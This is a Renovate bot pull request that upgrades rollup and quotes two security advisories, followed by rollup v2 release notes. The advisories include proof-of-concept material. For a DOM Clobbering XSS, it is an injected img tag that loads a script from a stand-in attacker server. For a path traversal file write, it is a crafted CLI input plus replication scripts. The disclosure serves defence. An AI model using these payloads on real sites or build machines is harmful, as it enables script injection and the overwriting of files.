Skip to content

chore(deps): update devdependency rollup to v2 [security]#72

Open
renovate[bot] wants to merge 1 commit intomasterfrom
renovate/npm-rollup-vulnerability
Open

chore(deps): update devdependency rollup to v2 [security]#72
renovate[bot] wants to merge 1 commit intomasterfrom
renovate/npm-rollup-vulnerability

Conversation

@renovate
Copy link
Contributor

@renovate renovate bot commented Sep 24, 2024

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package Change Age Confidence
rollup (source) ^1.19.4^2.0.0 age confidence

GitHub Vulnerability Alerts

CVE-2024-47068

Summary

We discovered a DOM Clobbering vulnerability in rollup when bundling scripts that use import.meta.url or with plugins that emit and reference asset files from code in cjs/umd/iife format. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

It's worth noting that we’ve identifed similar issues in other popular bundlers like Webpack (CVE-2024-43788), which might serve as a good reference.

Details

Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadget found in rollup

We have identified a DOM Clobbering vulnerability in rollup bundled scripts, particularly when the scripts uses import.meta and set output in format of cjs/umd/iife. In such cases, rollup replaces meta property with the URL retrieved from document.currentScript.

https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162

https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185

However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element (e.g., an img tag ) is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.

PoC

Considering a website that contains the following main.js script, the devloper decides to use the rollup to bundle up the program: rollup main.js --format cjs --file bundle.js.

var s = document.createElement('script')
s.src = import.meta.url + 'extra.js'
document.head.append(s)

The output bundle.js is shown in the following code snippet.

'use strict';

var _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;
var s = document.createElement('script');
s.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript && False && _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)) + 'extra.js';
document.head.append(s);

Adding the rollup bundled script, bundle.js, as part of the web page source code, the page could load the extra.js file from the attacker's domain, attacker.controlled.server due to the introduced gadget during bundling. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html>
<html>
<head>
  <title>rollup Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="bundle.js"></script>
<body>
</body>
</html>

Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that include rollup-bundled files (configured with an output format of cjs, iife, or umd and use import.meta) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.

Patch

Patching the following two functions with type checking would be effective mitigations against DOM Clobbering attack.

const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
	getResolveUrl(
		`'${escapeId(relativePath)}', ${
			umd ? `typeof document === 'undefined' ? location.href : ` : ''
		}document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`
	);
const getUrlFromDocument = (chunkId: string, umd = false) =>
	`${
		umd ? `typeof document === 'undefined' ? location.href : ` : ''
	}(${DOCUMENT_CURRENT_SCRIPT} && ${DOCUMENT_CURRENT_SCRIPT}.tagName.toUpperCase() === 'SCRIPT' &&${DOCUMENT_CURRENT_SCRIPT}.src || new URL('${escapeId(
		chunkId
	)}', document.baseURI).href)`;

CVE-2026-27606

Summary

The Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (../) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files.

Details

The vulnerability is caused by the combination of two flawed components in the Rollup core:

  1. Improper Sanitization: In src/utils/sanitizeFileName.ts, the INVALID_CHAR_REGEX used to clean user-provided names for chunks and assets excludes the period (.) and forward/backward slashes (/, \).

    // src/utils/sanitizeFileName.ts (Line 3)
    const INVALID_CHAR_REGEX = /[\u0000-\u001F"#$%&*+,:;<=>?[\]^`{|}\u007F]/g;

    This allows path traversal sequences like ../../ to pass through the sanitizer unmodified.

  2. Unsafe Path Resolution: In src/rollup/rollup.ts, the writeOutputFile function uses path.resolve to combine the output directory with the "sanitized" filename.

    // src/rollup/rollup.ts (Line 317)
    const fileName = resolve(outputOptions.dir || dirname(outputOptions.file!), outputFile.fileName);

    Because path.resolve follows the ../ sequences in outputFile.fileName, the resulting path points outside of the intended output directory. The subsequent call to fs.writeFile completes the arbitrary write.

PoC

A demonstration of this vulnerability can be performed using the Rollup CLI or a configuration file.

Scenario: CLI Named Input Exploit

  1. Target a sensitive file location (for demonstration, we will use a file in the project root called pwned.js).
  2. Execute Rollup with a specifically crafted named input where the key contains traversal characters:
    rollup --input "a/../../pwned.js=main.js" --dir dist
  3. Result: Rollup will resolve the output path for the entry chunk as dist + a/../../pwned.js, which resolves to the project root. The file pwned.js is created/overwritten outside the dist folder.

Reproduction Files provided :

  • vuln_app.js: Isolated logic exactly replicating the sanitization and resolution bug.
  • exploit.py: Automated script to run the PoC and verify the file escape.

vuln_app.js

const path = require('path');
const fs = require('fs');

/**
 * REPLICATED ROLLUP VULNERABILITY
 * 
 * 1. Improper Sanitization (from src/utils/sanitizeFileName.ts)
 * 2. Unsafe Path Resolution (from src/rollup/rollup.ts)
 */

function sanitize(name) {
    // The vulnerability: Rollup's regex fails to strip dots and slashes, 
    // allowing path traversal sequences like '../'
    return name.replace(/[\u0000-\u001F"#$%&*+,:;<=>?[\]^`{|}\u007F]/g, '_');
}

async function build(userSuppliedName) {
    const outputDir = path.join(__dirname, 'dist');
    const fileName = sanitize(userSuppliedName);

    // Vulnerability: path.resolve() follows traversal sequences in the filename
    const outputPath = path.resolve(outputDir, fileName);

    console.log(`[*] Target write path: ${outputPath}`);

    if (!fs.existsSync(path.dirname(outputPath))) {
        fs.mkdirSync(path.dirname(outputPath), { recursive: true });
    }

    fs.writeFileSync(outputPath, 'console.log("System Compromised!");');
    console.log(`[+] File written successfully.`);
}

build(process.argv[2] || 'bundle.js');

exploit.py

import subprocess
from pathlib import Path

def run_poc():
    # Target a file outside the 'dist' folder
    poc_dir = Path(__file__).parent
    malicious_filename = "../pwned_by_rollup.js"
    target_path = poc_dir / "pwned_by_rollup.js"

    print(f"=== Rollup Path Traversal PoC ===")
    print(f"[*] Malicious Filename: {malicious_filename}")
    
    # Trigger the vulnerable app
    subprocess.run(["node", "poc/vuln_app.js", malicious_filename])

    if target_path.exists():
        print(f"[SUCCESS] File escaped 'dist' folder!")
        print(f"[SUCCESS] Created: {target_path}")
        # target_path.unlink() # Cleanup
    else:
        print("[FAILED] Exploit did not work.")

if __name__ == "__main__":
    run_poc()

POC

rollup --input "bypass/../../../../../../../Users/vaghe/OneDrive/Desktop/pwned_desktop.js=main.js" --dir dist

image

Impact

This is a High level of severity vulnerability.

  • Arbitrary File Write: Attackers can overwrite sensitive files like ~/.ssh/authorized_keys, .bashrc, or system binaries if the build process has sufficient privileges.
  • Supply Chain Risk: Malicious third-party plugins or dependencies can use this to inject malicious code into other parts of a developer's machine during the build phase.
  • User Impact: Developers running builds on untrusted repositories are at risk of system compromise.

Release Notes

rollup/rollup (rollup)

v2.80.0

Compare Source

v2.79.2

Compare Source

2024-09-26

Bug Fixes
  • Fix a vulnerability in generated code that affects IIFE, UMD and CJS bundles when run in a browser context (#​5671)
Pull Requests

v2.79.1

Compare Source

2022-09-22

Bug Fixes
  • Avoid massive performance degradation when creating thousands of chunks (#​4643)
Pull Requests

v2.79.0

Compare Source

2022-08-31

Features
  • Add amd.forceJsExtensionForImports to enforce using .js extensions for relative AMD imports (#​4607)
Pull Requests

v2.78.1

Compare Source

2022-08-19

Bug Fixes
  • Avoid inferring "arguments" as name for a default export placeholder variable (#​4613)
Pull Requests

v2.78.0

Compare Source

2022-08-14

Features
  • Support writing plugin hooks as objects with a "handler" property (#​4600)
  • Allow changing execution order per plugin hook (#​4600)
  • Add flag to execute plugins in async parallel hooks sequentially (#​4600)
Pull Requests

v2.77.3

Compare Source

2022-08-11

Bug Fixes
  • Correctly resolve preserveModulesRoot in Vite (#​4591)
Pull Requests

v2.77.2

Compare Source

2022-07-27

Bug Fixes
  • Avoid a rendering failure when mixing outputs with inlined and non-inlined dynamic imports (#​4589)
Pull Requests

v2.77.1

Compare Source

2.77.1

2022-07-26

Bug Fixes
  • Ensure IIFE output generates a global variable when generating ES5 (#​4588)
Pull Requests

v2.77.0

Compare Source

2022-07-15

Features
  • Introduce maxParallelFileOps to limit both read and write operations, default to 20 and replaces maxParallelFileRead (#​4570)
Bug Fixes
  • Avoid including variables referenced from return statements that are never reached (#​4573)
Pull Requests

v2.76.0

Compare Source

2022-07-08

Features
  • Allow setting a sourcmapBaseUrl for absolute paths in sourcemaps (#​4527)
Bug Fixes
  • Support absolute CLI plugin paths on Windows (#​4533)
Pull Requests

v2.75.7

Compare Source

2022-06-20

Bug Fixes
  • Mark Array.prototype.group/groupToMap as side effect free. (#​4531)
Pull Requests

v2.75.6

Compare Source

2022-06-07

Bug Fixes
  • Properly deoptimize "this" when using member expressions with getters/setters in for loops and update expressions (#​4522)
Pull Requests

v2.75.5

Compare Source

2022-06-01

Bug Fixes
  • Avoid crashes when using logical expressions for unused constructor arguments (#​4519)
  • Fix missing parameter defaults for calls from try statements and functions returned by functions (#​4520)
Pull Requests

v2.75.4

Compare Source

2022-05-31

Bug Fixes
  • Ensure parameter defaults are retained when a function is used as an object property (#​4516)
Pull Requests

v2.75.3

Compare Source

2022-05-29

Bug Fixes
  • Retain parameter defaults for functions that are defaults themselves (#​4515)
  • Track mutations for objects as default values (#​4515)
Pull Requests

v2.75.2

Compare Source

v2.75.1

Compare Source

2022-05-28

Pull Requests

v2.75.0

Compare Source

2022-05-27

Features
  • Re-implement default parameter tree-shaking for top-level functions (#​4510)
  • Do not consider calling string methods like .trim() on template literals a side effect (#​4511)
Pull Requests

v2.74.1

Compare Source

2022-05-19

Bug Fixes
  • Revert #​4498 until some issues are understood and resolved

v2.74.0

Compare Source

2022-05-19

Features
  • Remove unneeded default values for function parameters (#​4498)
Bug Fixes
  • Use a consistent mechanism to resolve the config file to avoid issues on Windows (#​4501)
  • Avoid an inaccurate warning about an event emitter leak for complicated builds (#​4502)
  • Ensure that reexporting values from other chunks via dynamic imports does not reference non-imported variables (#​4499)
Pull Requests

v2.73.0

Compare Source

2022-05-13

Features
  • Do not treat Object.defineProperty/ies as side effect when called on an unused object (#​4493)
  • Do not assume that assigning a property can create a getter with side effects (#​4493)
  • Do not treat string.prototype.replace(All) as side effect when used with two literals (#​4493)
Bug Fixes
  • Detect side effects when manually declaring getters on functions (#​4493)
Pull Requests

v2.72.1

Compare Source

2022-05-07

Bug Fixes
  • Improve tree-shaking of classes with super classes in certain scenarios (#​4489)
Pull Requests

v2.72.0

Compare Source

2022-05-05

Features
  • Add CLI hooks to run external commands at certain points in watch mode (#​4457)
Bug Fixes
  • Fix an issue that could accidentally treat relevant assignments as side effect free (#​4486)
Pull Requests

v2.71.1

Compare Source

2022-04-30

Bug Fixes
  • Allow importing loadConfigFile without extension (#​4483)
Pull Requests

v2.71.0

Compare Source

2022-04-30

Features

Bug Fixes
  • Prevent infinite recursion and display proper warning for recursive reexports (#​4472)
  • Fix type issue in TypeScript nightly (#​4471)
Pull Requests

v2.70.2

Compare Source

2022-04-15

Bug Fixes
  • Do not enforce undefined return values in TypeScript types (#​4463)
Pull Requests

v2.70.1

Compare Source

2022-03-14

Bug Fixes
  • Handle unfinished hook action errors as regular errors and avoid console logging (#​4434)
  • Allow access to "dist" folder in a Node 17 compatible way (#​4436)
Pull Requests

v2.70.0

Compare Source

2022-03-07

Features
  • Make the watchChange and closeWatcher hooks asynchronous and make Rollup wait for these hooks before continuing (#​4427)
Bug Fixes
  • Do not abort watch mode for errors in watchChange but display them properly (#​4427)
Pull Requests

v2.69.2

Compare Source

2022-03-06

Bug Fixes
  • Mark Object.entries and Object.fromEntries as pure (#​4429)
  • Make sure new properties on Array.prototype and Object.prototype are not evaluated as "undefined" (#​4428)
Pull Requests

v2.69.1

Compare Source

2022-03-04

Bug Fixes
  • Approximate source position instead of ignoring it when using a low-resolution source map in a transform hook (#​4334)
Pull Requests

v2.69.0

Compare Source

2022-03-02

Features
  • Introduce new output.generatedCode.symbols to control the usage of Symbols in Rollup-generated code (#​4378)
  • soft-deprecate output.namespaceToStringTag in favor of output.generatedCode.symbols (#​4378)
Bug Fixes
  • Properly handle ./ and ../ as external dependencies (#​4419)
  • Make generated "Module" namespace toStringTag non-enumerable for correct Object.assign/spread behaviour (#​4378)
  • Add file name to error when top-level-await is used in disallowed formats (#​4421)
Pull Requests

v2.68.0

Compare Source

2022-02-22

Features
  • provide information about cached import resolutions in shouldTransformCachedModule (#​4414)
  • Add "types" field to Rollup's package exports (#​4416)
Pull Requests

v2.67.3

Compare Source

2022-02-18

Bug Fixes
  • Do not swallow other errors when unfinished hook actions are detected (#​4409)
  • Add additional information to output when there are unfinished hook actions (#​4409)
Pull Requests

v2.67.2

Compare Source

2022-02-10

Bug Fixes
  • Ensure consistent order between manual chunks to fix hashing issues (#​4397)
Pull Requests

v2.67.1

Compare Source

2022-02-07

Bug Fixes
  • Make chunk file and variable names more deterministic when emitting chunks (#​4386)
  • Improve default module resolver performance by using non-blocking IO (#​4386)
Pull Requests

v2.67.0

Compare Source

2022-02-02

Features
  • Improve side effect detection when using Array.prototype.groupBy/groupByToMap (#​4360)
  • Allow changing moduleSideEffects at any time during the build (#​4379)
  • Soft-deprecate ModuleInfo.hasModuleSideEffects in favour of ModuleInfo.moduleSideEffects (#​4379)
Bug Fixes
  • Do not include queries and hashes in generated file names when preserving modules (#​4374)
Pull Requests

v2.66.1

Compare Source

2022-01-25

Bug Fixes
  • Only warn for conflicting names in namespace reexports if it actually causes problems (#​4363)
  • Only allow explicit exports or reexports as synthetic namespaces and hide them from namespace reexports (#​4364)
Pull Requests

v2.66.0

Compare Source

2022-01-22

Features
  • Note if a module has a default export in ModuleInfo to allow writing better proxy modules (#​4356)
  • Add option to wait until all imported ids have been resolved when awaiting this.load (#​4358)
Pull Requests

v2.65.0

Compare Source

2022-01-21

Features
  • Add complete import resolution objects to ModuleInfo for use in this.load (#​4354)
Bug Fixes
  • Use correct context in plugin hooks with perf: true (#​4357)
Pull Requests

v2.64.0

Compare Source

2022-01-14

Features
  • Allow inspecting cached modules and forcing them to be transformed again via shouldTransformCachedModule (#​4320)
  • Do not wait for the config file to be parsed in watch mode if it is updated before that (#​4344)
Bug Fixes
  • Do not mutate objects returned as meta from the resolveId hook (#​4347)
Pull Requests

v2.63.0

Compare Source

2022-01-04

Features
  • Report a helpful error if rollup exits due to an empty event loop when using this.load (#​4320)
  • Allow directly mutating ModuleInfo.meta for modules and never replace this object (#​4328)
  • Detect additional side effect free array prototype methods (#​4332)
Bug Fixes
  • Do not watch if CLI watch options are specified but --watch is missing (#​4335)
Pull Requests

v2.62.0

Compare Source

2021-12-24

Features
  • Mark additional string prototype methods as side-effect-free and correct typings of existing ones (#​4299)
  • Mark additional array prototype methods as side-effect-free and correct typings of existing ones (#​4309)
  • Expose if a module is included after tree-shaking in its ModuleInfo (#​4305)
Bug Fixes
  • Fix how fsevents is included to improve watch mode on MacOS (#​4312)
Pull Requests

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate bot changed the title chore(deps): update devdependency rollup to v3 [security] chore(deps): update devdependency rollup to v3 [security] - autoclosed Sep 26, 2024
@renovate renovate bot closed this Sep 26, 2024
@renovate renovate bot deleted the renovate/npm-rollup-vulnerability branch September 26, 2024 21:58
@renovate renovate bot restored the renovate/npm-rollup-vulnerability branch September 27, 2024 00:48
@renovate renovate bot changed the title chore(deps): update devdependency rollup to v3 [security] - autoclosed chore(deps): update devdependency rollup to v3 [security] Sep 27, 2024
@renovate renovate bot reopened this Sep 27, 2024
@renovate renovate bot force-pushed the renovate/npm-rollup-vulnerability branch from 01c2fa9 to d5b41da Compare September 27, 2024 00:48
@renovate renovate bot changed the title chore(deps): update devdependency rollup to v3 [security] chore(deps): update devdependency rollup to v2 [security] Sep 27, 2024
@renovate renovate bot force-pushed the renovate/npm-rollup-vulnerability branch from d5b41da to c222f08 Compare February 28, 2026 01:33
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants